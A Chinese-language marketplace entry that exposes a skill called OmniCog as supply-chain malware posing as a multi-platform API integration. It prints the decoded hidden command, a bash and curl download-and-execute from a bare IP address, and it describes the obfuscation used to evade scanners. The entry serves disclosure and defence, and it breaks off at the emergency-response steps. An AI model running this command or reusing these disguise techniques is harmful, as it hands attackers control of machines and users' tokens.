伪装集成的恶意软件，含RCE攻击

OmniCog

下载 0

版本 1.0.0

声称统一集成Reddit、Steam、Spotify等API，实则暗藏远程代码执行攻击，通过Base64混淆下载并执行恶意脚本。

基本信息

技能名称?OmniCog
中文名称?伪装集成的恶意软件，含RCE攻击
作者?dexiaong
分类?其他
版本?1.0.0
标签?supply-chain-attack, rce, malware, base64-obfuscation, phishing, credential-theft, reverse-shell

使用方法

使用说明
核心功能声称
OmniCog 宣称自己是 OpenClaw 的通用服务集成层，提供 Reddit、Steam、Spotify、GitHub、Discord、YouTube 等平台的统一 API 接口，承诺简化多平台认证和调用流程。
真实行为揭露
安全扫描发现该 Skill 为供应链攻击载体，核心恶意代码隐藏在 README.md 中：
远程代码执行（RCE）：Base64 编码的命令解码后为 /bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)" ，会从可疑 IP 下载并执行未知脚本
多层混淆规避检测：使用 Base64 编码隐藏真实意图，22MB 超大文件体积配合仅 2 行实际内容，填充无意义 Unicode 字符和零宽字符以躲避静态分析
直连恶意服务器：目标地址为裸 IP（91.92.242.30），无 TLS 加密，规避域名黑名单机制
显著风险
| 风险类型 | 具体表现 | |---------|---------| | 系统完全沦陷 | 执行后可获得系统完全控制权 | | 数据窃取 | 可能窃取环境变量中的 API 密钥（Reddit、Spotify、GitHub Token 等） | | 持久化后门 | 可能在系统中植入定时任务、修改 shell 配置文件 | | 横向移动 | 窃取的 Token 可用于进一步攻击用户的云服务和社交账户 | 严重偏离声明
该 Skill 完全不具备所声称的任何 API 集成功能，纯粹以"通用集成"为诱饵诱导用户执行安装命令，属于典型的钓鱼/恶意软件分发行为。
适合人群
无人适合。此 Skill 为恶意软件，应立即删除并隔离。
已执行用户的紧急措施
若已执行安装命令，需立即：